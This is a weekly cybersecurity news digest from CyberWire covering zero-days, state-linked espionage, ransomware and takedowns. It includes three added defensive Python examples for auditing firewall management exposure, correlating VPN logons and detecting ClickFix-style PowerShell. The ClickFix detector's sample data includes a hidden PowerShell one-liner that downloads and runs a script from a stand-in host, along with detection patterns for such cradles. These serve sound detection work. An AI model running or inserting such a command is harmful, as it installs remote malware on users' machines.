By the CyberWire staff
At a glance.
- Palo Alto Networks warns of PAN-OS zero-day exploitation.
- LIMINAL PANDA targets telecoms.
- DeepData malware framework exploits Fortinet zero-day.
- Finastra is reportedly investigating a breach.
- China-aligned threat actor deploys new Linux malware.
- VMware vCenter Server flaws are being actively exploited.
- Russian cyberespionage campaign targets former Soviet states.
- Akira and SafePay ransomware groups claim dozens of victims.
- Meta takes down millions of accounts linked to pig-butchering scams.
- Microsoft seizes hundreds of phishing domains.
Palo Alto Networks warns of PAN-OS zero-day exploitation.
Palo Alto Networks has confirmed that threat actors are exploiting a recently discovered vulnerability affecting its PAN-OS firewall management interface, the Record reports. The vulnerability (CVE-2024-0012) has been assigned a CVSS score of 9.3, and the company urges customers to apply mitigations as soon as possible.
Palo Alto stated, "An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474." The company added that it's "observed threat activity that exploits this vulnerability against a limited number of management web interfaces that are exposed to internet traffic coming from outside the network."
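The exposure Palo Alto describes is a management web interface reachable from the internet. The standard mitigation is to restrict management access to a short list of trusted internal source ranges, and that is a property you can audit across a fleet. The following is an added example, not Palo Alto Networks code: the config dictionary is a constructed, simplified representation of a per-interface "permitted sources" list (not the PAN-OS configuration format), and the policy thresholds are assumptions.

```python
"""Audit management-interface allow-lists for internet exposure. Added
example, not Palo Alto Networks code: the config below is a constructed,
simplified representation of a per-interface "permitted sources" list, not
the PAN-OS configuration format, and the thresholds are assumptions."""
import ipaddress

# Constructed sample: management interface name -> permitted source ranges.
# An empty list is taken to mean "no restriction configured" (assumption).
SAMPLE_MGMT_CONFIG = {
    "fw-dc-01":     ["10.0.0.0/8", "192.168.50.0/24"],
    "fw-branch-07": [],
    "fw-dmz-02":    ["0.0.0.0/0"],
    "fw-vpn-03":    ["10.10.0.0/16", "172.0.0.0/6"],
}

MIN_PREFIX = 8   # assumed policy: a permitted range broader than a /8 is a finding


def classify_source(entry):
    """Describe why a permitted-source entry is risky, or return None if acceptable."""
    net = ipaddress.ip_network(entry, strict=False)
    if net.prefixlen == 0:
        return f"{net} allows any source"
    if net.prefixlen < MIN_PREFIX:
        return f"{net} is broader than /{MIN_PREFIX}"
    if not net.is_private:
        return f"{net} is not a private range"
    return None


def audit_management_exposure(config):
    """Return {interface: [findings]} for interfaces whose allow-list leaves the
    management plane reachable from outside the internal network."""
    findings = {}
    for name, allowed in config.items():
        issues = [] if allowed else ["no permitted-source restriction configured"]
        issues += [f for f in map(classify_source, allowed) if f]
        if issues:
            findings[name] = issues
    return findings


if __name__ == "__main__":
    for iface, issues in audit_management_exposure(SAMPLE_MGMT_CONFIG).items():
        print(iface, "->", "; ".join(issues))
```

Run against an export of your real allow-lists, an empty result means every management interface is limited to private ranges no broader than a /8; anything else is a candidate for the "exposed to internet traffic" case the advisory warns about.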
LIMINAL PANDA targets telecoms.
CrowdStrike has published a report on LIMINAL PANDA, a Chinese threat actor targeting telecommunications companies in countries associated with China’s Belt and Road Initiative. The researchers note, "The adversary targets these organizations to directly collect network telemetry and subscriber information or to breach other telecommunications entities by exploiting the industry’s interoperational connection requirements."
The goal of the operation is likely cyberespionage. CrowdStrike explains, "LIMINAL PANDA has previously focused on telecommunications providers in southern Asia and Africa, suggesting that their final targets likely reside in these regions; however, individuals roaming in these areas may also be targeted depending on the compromised network’s configuration and LIMINAL PANDA’s current access. Equally, depending on their current collection requirements, the adversary could employ similar TTPs to target telecoms in other regions."
DeepData malware framework exploits Fortinet zero-day.
Volexity warns that the DeepData malware framework is exploiting a zero-day credential disclosure vulnerability affecting Fortinet’s Windows VPN client (FortiClient). Volexity reported the flaw to Fortinet in July 2024, but it remains unpatched.
Volexity says the DeepData framework was developed by a Chinese state-sponsored threat actor tracked as "BrazenBamboo," though this threat actor isn't necessarily an operator of the malware. The researchers write, "DEEPDATA supports a wide range of functionality to extract data from victims’ systems. The observed functionality of several plugins is commonly seen and includes items typically stolen from victim systems. However, Volexity noted the FortiClient plugin was uncommon and investigated it further. Volexity found the FortiClient plugin was included through a library with the filename msenvico.dll. This plugin was found to exploit a zero-day vulnerability in the Fortinet VPN client on Windows that allows it to extract the credentials for the user from memory of the client’s process."
Finastra is reportedly investigating a breach.
KrebsOnSecurity reports that financial technology giant Finastra is investigating a large theft of information from its internal file transfer platform. The company began notifying customers of the breach on November 8th, informing them that a threat actor was selling the alleged stolen data on the dark web. Finastra said in a breach notification letter, "There is no direct impact on customer operations, our customers’ systems, or Finastra’s ability to serve our customers currently. We have implemented an alternative secure file-sharing platform to ensure continuity, and investigations are ongoing." The company added that it's still investigating the cause of the breach, but "initial evidence points to credentials that were compromised."
China-aligned threat actor deploys new Linux malware.
ESET has published a report on "WolfsBane," a newly discovered Linux backdoor deployed by the China-aligned threat actor Gelsemium. WolfsBane samples were uploaded to VirusTotal by users in Taiwan, the Philippines, and Singapore, which aligns with Gelsemium's targeting in previous campaigns. WolfsBane is the Linux equivalent of Gelsemium’s Gelsevirine Windows backdoor. ESET notes, "The trend of APT groups focusing on Linux malware is becoming more noticeable. We believe this shift is due to improvements in Windows email and endpoint security, such as the widespread use of endpoint detection and response (EDR) tools and Microsoft’s decision to disable Visual Basic for Applications (VBA) macros by default."
VMware vCenter Server flaws are being actively exploited.
The US Cybersecurity and Infrastructure Security Agency (CISA) warns that two vulnerabilities affecting VMware vCenter Server are being actively exploited. One of the flaws (CVE-2024-38812) has been assigned a CVSS score of 9.8 and can allow an attacker to achieve remote code execution. Broadcom issued updated patches in October after determining that its September patches didn't fully address the vulnerability. The company strongly encourages customers to ensure they've applied the new patches. The vulnerabilities affect "VMware vCenter and any products that contain vCenter, including VMware vSphere and VMware Cloud Foundation."
Russian cyberespionage campaign targets former Soviet states.
Recorded Future's Insikt Group has published a report on a Russian cyberespionage campaign targeting organizations in Central Asia, East Asia, and Europe with two strains of custom malware dubbed "HATVIBE" and "CHERRYSPY." Insikt Group attributes the campaign to the Russia-aligned threat actor TAG-110, noting that the tactics overlap with previous operations by Russia's APT28 (also known as "Fancy Bear").
Since July 2024, the espionage campaign has targeted governments, human rights groups, and educational institutions in eleven countries, including Kazakhstan, Kyrgyzstan, and Uzbekistan. The researchers note, "TAG-110’s efforts are likely part of a broader Russian strategy to gather intelligence on geopolitical developments and maintain influence in post-Soviet states."
Akira and SafePay ransomware groups claim dozens of victims.
The Akira ransomware group posted 32 victims to its leak site in a single day last week, according to researchers at Cyberint. The ransomware-as-a-service operation claims to have compromised more than 350 organizations since its emergence in March 2023. Most of its recent victims are located in the United States.
Separately, researchers at Huntress warn that the relatively new ransomware gang "SafePay" has claimed 22 victims as of November 14th. The group's ransomware appears to be built using the leaked LockBit source code. Huntress analyzed two of the group's attacks, noting, "In both incidents, the threat actor’s activity was found to originate from a VPN gateway or portal, as all observed IP addresses assigned to threat actor workstations were within the internal range. The threat actor was able to use valid credentials to access customer endpoints, and was not observed enabling RDP, nor creating new user accounts, nor creating any other persistence."
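The pattern Huntress describes, valid credentials, activity sourced from the VPN address pool, no RDP and no new accounts, leaves little for signature-based tooling to catch, but it does show up when VPN session records are joined to endpoint logon events. The following is an added example, not Huntress's tooling: the log layouts, the VPN pool range, the time window and the host threshold are all assumptions, and the events are constructed.

```python
"""Correlate VPN session assignments with endpoint logons to surface
"valid credentials over VPN, fanning out to many hosts" activity.
Added example, not Huntress's tooling; log layout, VPN pool and thresholds
are assumptions and the sample events are constructed."""
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

VPN_POOL = ip_network("10.20.5.0/24")   # assumed address pool handed to VPN clients
WINDOW = timedelta(minutes=60)          # assumed correlation window after session start
HOST_THRESHOLD = 4                      # assumed: four or more distinct hosts in the window

# Constructed sample logs: VPN concentrator session records ...
VPN_SESSIONS = [
    {"ts": "2024-11-12T22:03:10", "user": "jdoe",   "assigned_ip": "10.20.5.14"},
    {"ts": "2024-11-12T09:15:00", "user": "asmith", "assigned_ip": "10.20.5.77"},
]
# ... and endpoint logon events (logon_type 3 = network, 10 = RDP).
ENDPOINT_LOGONS = [
    {"ts": "2024-11-12T22:05:41", "host": "FS01",   "user": "jdoe",       "src_ip": "10.20.5.14", "logon_type": 3},
    {"ts": "2024-11-12T22:09:02", "host": "SQL02",  "user": "jdoe",       "src_ip": "10.20.5.14", "logon_type": 3},
    {"ts": "2024-11-12T22:11:57", "host": "DC01",   "user": "jdoe",       "src_ip": "10.20.5.14", "logon_type": 3},
    {"ts": "2024-11-12T22:20:30", "host": "WS-114", "user": "jdoe",       "src_ip": "10.20.5.14", "logon_type": 3},
    {"ts": "2024-11-12T09:20:00", "host": "WS-042", "user": "asmith",     "src_ip": "10.20.5.77", "logon_type": 10},
    {"ts": "2024-11-12T22:30:00", "host": "FS01",   "user": "svc-backup", "src_ip": "10.30.1.9",  "logon_type": 3},
]


def _t(s):
    return datetime.fromisoformat(s)


def correlate(sessions, logons, window=WINDOW, threshold=HOST_THRESHOLD):
    """For each VPN session, gather endpoint logons from its assigned address
    within the window and alert when they fan out to many distinct hosts."""
    alerts = []
    for s in sessions:
        if ip_address(s["assigned_ip"]) not in VPN_POOL:
            continue  # not VPN-sourced; out of scope for this rule
        start = _t(s["ts"])
        hits = [l for l in logons
                if l["src_ip"] == s["assigned_ip"]
                and start <= _t(l["ts"]) <= start + window]
        hosts = sorted({l["host"] for l in hits})
        if len(hosts) >= threshold:
            alerts.append({
                "user": s["user"],
                "assigned_ip": s["assigned_ip"],
                "session_start": s["ts"],
                "hosts": hosts,
                # True when every logon was network-type, i.e. no RDP was used,
                # matching the "not observed enabling RDP" observation.
                "network_only": all(l["logon_type"] != 10 for l in hits),
            })
    return alerts


if __name__ == "__main__":
    for a in correlate(VPN_SESSIONS, ENDPOINT_LOGONS):
        print(f"{a['user']} via {a['assigned_ip']} reached {len(a['hosts'])} hosts: {a['hosts']}")
```

The rule keys on the VPN-assigned address rather than on the user name, so it still fires if the same credentials are later used from a different session; tune the window and threshold to the baseline of your own remote workforce.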
Meta takes down millions of accounts linked to pig-butchering scams.
Facebook's parent company Meta has taken down over two million accounts this year tied to pig-butchering scams, CyberScoop reports. Pig butchering is a form of investment scam that involves forming a long-term, trusted relationship with the victim and tricking them into pouring a great deal of money into a phony investment scheme, usually involving cryptocurrency. The scams often begin on dating apps or social media sites.
Many of these scams are run out of criminal forced-labor operations in Myanmar, Laos, Cambodia, the United Arab Emirates, and the Philippines. Meta states, "During the COVID-19 pandemic, scam compounds run by organized crime emerged in the Asia Pacific region as one of the major sources of ‘pig butchering’ and other scam activity. And while they are mostly based in Asia, scam centers target people across the globe. These criminal scam hubs lure often unsuspecting job seekers with too-good-to-be-true job postings on local job boards, forums, and recruitment platforms to then force them to work as online scammers, often under the threat of physical abuse."
Microsoft seizes hundreds of phishing domains.
Microsoft’s Digital Crimes Unit has seized 240 domains used by the ONNX phishing-as-a-service operation, BleepingComputer reports. Microsoft stated, "Phishing emails originating from these 'do it yourself' kits make up a significant portion of the tens to hundreds of millions of phishing messages observed by Microsoft each month. The fraudulent ONNX operations are part of the broader “Phishing-as-a-Service” (PhaaS) industry and as noted in this year’s Microsoft Digital Defense Report, the operation was among the top five phish kit providers by email volume in the first half of 2024."
Microsoft also named an Egyptian national, Abanoub Nady, as the alleged leader of the fraudulent ONNX operation.
ClickFix attacks trick users into running malicious PowerShell commands.
Proofpoint describes a social engineering technique dubbed "ClickFix," which attempts to trick users into copying and pasting PowerShell commands to install malware. Proofpoint explains, "The ClickFix technique is used by multiple different threat actors and can originate via compromised websites, documents, HTML attachments, malicious URLs, etc. In most cases, when directed to the malicious URL or file, users are shown a dialog box that suggests an error occurred when trying to open a document or webpage. This dialog box includes instructions that appear to describe how to 'fix' the problem, but will either: automatically copy and paste a malicious script into the PowerShell terminal, or the Windows Run dialog box, to eventually run a malicious script via PowerShell; or provide a user with instructions on how to manually open PowerShell and copy and paste the provided command."
The technique has been used to install a range of malware strains, including AsyncRAT, Danabot, DarkGate, Lumma Stealer, and NetSupport.
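Because ClickFix relies on the user pasting a one-liner into the Run dialog or a PowerShell window, the resulting process tree is distinctive: a PowerShell process whose parent is the user's shell, carrying a download-and-execute cradle or an encoded command. The following is an added example, not Proofpoint's detection logic: the event layout is a simplified Sysmon-style process-creation record, the list of "interactive" parent processes is an assumption, and the sample events are constructed.

```python
"""Flag process-creation events that look like ClickFix: a user-launched
PowerShell (parent is the shell that owns the Run dialog) carrying a
download-and-execute cradle or an encoded command. Added example, not
Proofpoint's detection logic; event layout and parent list are assumptions."""
import re

# Parents indicating the command was typed or pasted by the user
# (Win+R Run dialog and Start-menu launches are children of explorer.exe).
# Assumed list; extend for the terminal emulators in your environment.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# (regex, label) pairs for traits common to pasted one-liners.
INDICATORS = [
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "in-memory execution"),
    (re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I),
     "remote fetch"),
    (re.compile(r"(?<![\w-])-(?:e|ec|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), "profile bypass"),
    (re.compile(r"-(?:ep|executionpolicy)\s+bypass\b", re.I), "execution policy bypass"),
]

# Constructed sample events (simplified process-creation records).
SAMPLE_EVENTS = [
    {"pid": 4120, "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": 'powershell -w hidden -nop -c "iex (iwr http://update.example.invalid/fix.txt)"'},
    {"pid": 4188, "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": "powershell Get-ChildItem C:\\Users\\jdoe\\Documents"},
    {"pid": 4203, "image": "powershell.exe", "parent": "services.exe",
     "cmdline": "powershell.exe -NoProfile -EncodedCommand UwB0AGEAcgB0AC0AUwBlAHIAdgBpAGMAZQA="},
    {"pid": 4250, "image": "notepad.exe", "parent": "explorer.exe",
     "cmdline": "notepad.exe fix.txt"},
]


def matched_indicators(cmdline):
    """Labels of every indicator present in the command line."""
    return [label for rx, label in INDICATORS if rx.search(cmdline)]


def assess_event(ev):
    """Verdict for one event: 'clickfix-suspect', 'review', or None (benign)."""
    if ev["image"].lower() not in POWERSHELL_IMAGES:
        return None
    hits = matched_indicators(ev["cmdline"])
    interactive = ev["parent"].lower() in INTERACTIVE_PARENTS
    has_cradle = "in-memory execution" in hits and "remote fetch" in hits
    if interactive and (has_cradle or "encoded command" in hits):
        return "clickfix-suspect"
    if len(hits) >= 2:
        return "review"   # suspicious traits, but not launched by the user's shell
    return None


def scan_events(events):
    """Return [{pid, verdict, indicators}] for every event that is not benign."""
    out = []
    for ev in events:
        verdict = assess_event(ev)
        if verdict:
            out.append({"pid": ev["pid"], "verdict": verdict,
                        "indicators": matched_indicators(ev["cmdline"])})
    return out


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

The parent-process condition is what separates a pasted ClickFix command from the same flags used by management agents or scheduled tasks, which is why the non-interactive encoded command only earns a "review" rather than a "clickfix-suspect" verdict.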
CISA director Jen Easterly will depart in January.
Nextgov reports that Jen Easterly, director of the US Cybersecurity and Infrastructure Security Agency (CISA), will leave the agency when President-elect Trump is inaugurated on January 20th. Also departing are Deputy Director Nitin Natarajan, Executive Assistant Director for Cybersecurity Jeff Greene, and Executive Assistant Director for Infrastructure Security David Mussington.
A CISA spokesperson told Meritalk, "All appointees of the Biden administration will vacate their positions by the time the new administration takes office at noon on January 20th. At CISA, we are fully committed to a seamless transition."
Patch news.
Oracle has issued a patch for an actively exploited vulnerability (CVE-2024-21287) affecting its Agile Product Lifecycle Management software, BleepingComputer reports. Oracle stated, "This vulnerability is remotely exploitable without authentication, i.e., it may be exploited over a network without the need for a username and password. If successfully exploited, this vulnerability may result in file disclosure."
Crime and punishment.
The US Justice Department has charged five alleged members of the Scattered Spider cybercriminal group, accusing them of exfiltrating sensitive corporate data and stealing millions of dollars worth of cryptocurrency, CyberScoop reports. Four of the defendants are US citizens, and one is from the UK.
The Justice Department has also charged a 42-year-old Russian national named Evgenii Ptitsyn as an alleged administrator of the Phobos ransomware-as-a-service operation. The defendant was extradited from South Korea and appeared before the US District Court for the District of Maryland earlier this month. The Justice Department says Phobos affiliates have "victimized more than 1,000 public and private entities in the United States and around the world, and extorted ransom payments worth more than $16 million dollars."